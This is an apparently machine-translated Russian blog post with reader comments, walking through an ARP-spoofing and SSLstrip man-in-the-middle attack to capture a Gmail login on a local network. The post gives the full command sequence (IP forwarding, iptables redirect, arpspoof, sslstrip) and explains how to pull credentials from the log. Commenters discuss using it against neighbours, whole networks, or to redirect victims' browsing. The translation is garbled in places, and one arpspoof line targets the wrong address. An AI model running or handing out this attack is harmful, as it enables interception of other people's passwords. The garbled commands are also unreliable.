Привет, блогеры.
На сегодняшний день у меня есть небольшой пример того, насколько опасным может быть подключение к любой сети без защиты тех, которые нравятся многим из нас.
На сегодня я собираюсь использовать ArpSpoofing с Sslstrip, чтобы получить пароль Gmail. Чтобы сделать среду более контролируемой, я создал учетную запись "testarp@gmail.com».
И поскольку мне не очень нравятся преамбулы, давайте перейдем к делу.
СРЕДА
Для этого теста у нас есть следующее:
1. Злоумышленник: Это мой настольный или настольный компьютер с Debian Wheezy. Из репозиториев можно установить SSLstrip y нюхать получить иметь арпспуфинг
2. Жертва: Жертва - это Android-планшет, который хочет видеть свою почту только через браузер.
3. Среда: Середина моя Маршрутизатор Cisco DPC2425
АДРЕСА.
Адрес злоумышленника: 172.26.0.2
Адрес маршрутизатора: 172.26.0.1
Адрес жертвы: 172.26.0.8
АТАКА:
Первое, что мы сделаем для этой атаки, - это активируем переадресацию, чтобы наш компьютер мог пересылать информацию жертве, чтобы она не заметила. (В противном случае это была бы атака отказа в обслуживании)
Для этого мы будем использовать:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Теперь, если мы сделаем Tail -f desdelinux мы видим информацию в прямом эфире
Так как же нам получить то, что мы хотим?
Давайте сначала введем нашу почту на Планшет. Войдя в систему, мы видим, что на нашей консоли появляются тысячи и тысячи вещей.
Теперь, когда все готово, давайте откроем наш файл «desdelinux» с нано
nano desdelinux
с помощью Control + W ищем то, что называется SECURE POST.
И мы увидим нечто подобное.
Среди этой огромной строки, которую невозможно увидеть, - адрес электронной почты и пароль жертвы.
Итак, мы бежим вправо, пока наконец не увидим свет в конце туннеля.
В другой раз мы увидим, как мы можем немного защитить себя от этих атак.
привет
Пользуясь случаем, хочу сказать, что когда пост был опубликован, команды были неправильными.
В команде iptables в конце отсутствует 8080, который находится в другой строке. И тогда все команды arpspoof были в одной строке. Каждая команда находится в отдельной строке.
Надеюсь, редактор это заметит и сможет исправить.
Привет.
Я внес исправления, о которых вы упомянули, хорошо?
Если вы собираетесь вставить код в предпочтительную запись, используйте представление HTML и убедитесь, что статья верна, прежде чем отправлять ее в режим ожидания. Спасибо.
Страшно осознавать, что те из нас, у кого нет знаний, настолько уязвимы. Очень хорошая информация, даже когда я плохо разбираюсь в предмете, я осознаю важность. Спасибо!
привет
Но это работает, только если злоумышленник и жертва находятся в одной сети. В любом случае мне кажется, что если (находясь в той же сети) вы подключаетесь с использованием HTTPS, этого не происходит, потому что данные зашифрованы ДО того, как покинуть вашу машину. Если вы подключаетесь по HTTP (без S), я думаю, что даже глядя на сетевой кабель, вы видите ключи.
Это не правда. Я взламываю пароль Gmail, и если вы заметили, что Gmail использует https. Так? Дело в том, что хотя https и безопасен, он зависит от http. Так что это не так уж и безопасно.
Не надо так сильно признаваться в https, что S не для Супермена, а для "безопасности"
он работает с https или без него, я пробовал его с более специализированным дистрибутивом linux, и он работает без проблем
Вы можете точно использовать его, чтобы преподать урок тем, кто ворует ваш Wi-Fi. 😀
Это более или менее похоже на то, что они сказали давным-давно в блоге Чема Алонсо:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Остия, здорово, что он делает! / А потом они рассказывают моему параноику каждый раз, когда я использую VPN, когда они идут проверять банковский счет…). Кстати, вы должны видеть, насколько циничны люди в комментариях ... если в конце концов это воровство ...
Теперь нам нужно изучить руководство о том, как создать и предложить свой собственный VPN-сервис.
История, на которую вы ссылаетесь, очень интересна, она даже кажется достойной романа, и это заставляет меня вспомнить, когда я пользовался Интернетом своих соседей, и хотя я говорю, что знаю предмет, я думаю, что никогда не смогу увидеть истинные масштабы опасности, которая могла быть у меня. последнее, к счастью для меня, они изменили пароль только на WPA2, и с этого началась моя история с провайдером хаха
Вот почему в названии написано, что Sslstrip работает.
Работает, пока атакующий находится посередине
С какой волной вы работаете с призмой? -.-
нет.
Что вы ждете, чтобы отправить запрос XD
привет
хороший пост
Интересно, позже сделаю обучающий тест ... Может, еще удастся снять пароль от WiFi и немного повеселиться 😛
Не могли бы вы сделать что-то подобное, чтобы отправить разные страницы на те, которые запрашивала цель? Например, они хотят открыть Facebook, а я перенаправляю их в Google? 😛
Да. Но это все совсем другой ролл.
Может позже выложу.
очень хороший пост, эти темы очень познавательные, теперь нам нужно иметь возможность противодействовать этой атаке, поскольку некоторые (например, я) подключаются к общедоступным сетям (например, университет), было бы полезно избежать этого.
Привет!
У меня не получилось 🙁
Что-то здесь меня не подводит, кроме того факта, что https-соединения зашифрованы с помощью сертификата сервера (если у вас есть сертификат на вашем компьютере, ваш браузер отвечает за шифрование) с iptables вы перенаправляете порт 80 (http) , а не 443, который является https
Я тоже так думал. Дело в том, что, хотя https и «безопасен», он, к сожалению, зависит от http. Таким образом, sslstrip использует это преимущество, заставляя браузер полагать, что он использует учетные данные https, но это не так.
Ебена мать! но браузер должен увидеть предупреждение типа «этот сертификат пришел с подозрительного сайта или что-то в этом роде» ... Мне обязательно нужно будет сделать тесты XD
Нет, абсолютно ничего не выходит.
Наконец-то это сработало для меня
Я подключен к сети WEP с паролем, и он все равно показал мне пароль напрямую.
Запрос. Можете ли вы проделать ту же процедуру, но для всех компьютеров, подключенных к сети, вместо одной жертвы?
Да, ты можешь. Но я не проводил экспериментов. Попробуйте сами и расскажите, как у вас дела.
Единственное, что я получаю, это то, что машина жертвы отключается, но sslstrip ничего мне не показывает: /
Вам нужно на время отключить брандмауэр. Или хотя бы разрешить входящие соединения.
Мы с Probe могли видеть только имя пользователя и пароль страницы facebook, в gmail я не нашел результатов в журнале, также мне нужна была только строка arpspoof «arpspoof -i -t«. С другой стороны, машина-жертва не могла открыть некоторые страницы. Я продолжу расследование, это очень интересно. В помощь тем, кто использует Manjaro, нужно установить следующие пакеты: dsniff (здесь arpspoff), twisted и python2-pyopenssl. Sslstrip можно скачать отсюда: http://www.thoughtcrime.org/software/sslstrip/
Чтобы запустить его $ python2 sslstrip.py
Привет.
Не получилось, но строка arpspoof такая: #arpspoof -i int -t ip-жертва ip-router
смотри, я делаю именно то, что ты говоришь:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
арспуф -i eth0 -t 172.26.0.8 172.26.0.1
арспуф -i eth0 -t 172.26.0.1 172.26.0.2
Проблема в том, что жертва, которая является другим компьютером, который у меня есть здесь, в моей комнате, осталась без подключения к точке, что мне нужно перезапустить маршрутизатор, что я могу сделать, помогите мне.
Еще я работаю с виртуальной машиной, и когда я выполняю команду iwconfig, ни wlan0 не появляется, ни когда я выполняю ifconfig, однако, если у меня есть Интернет на моей виртуальной машине, то с интерфейсом eth0.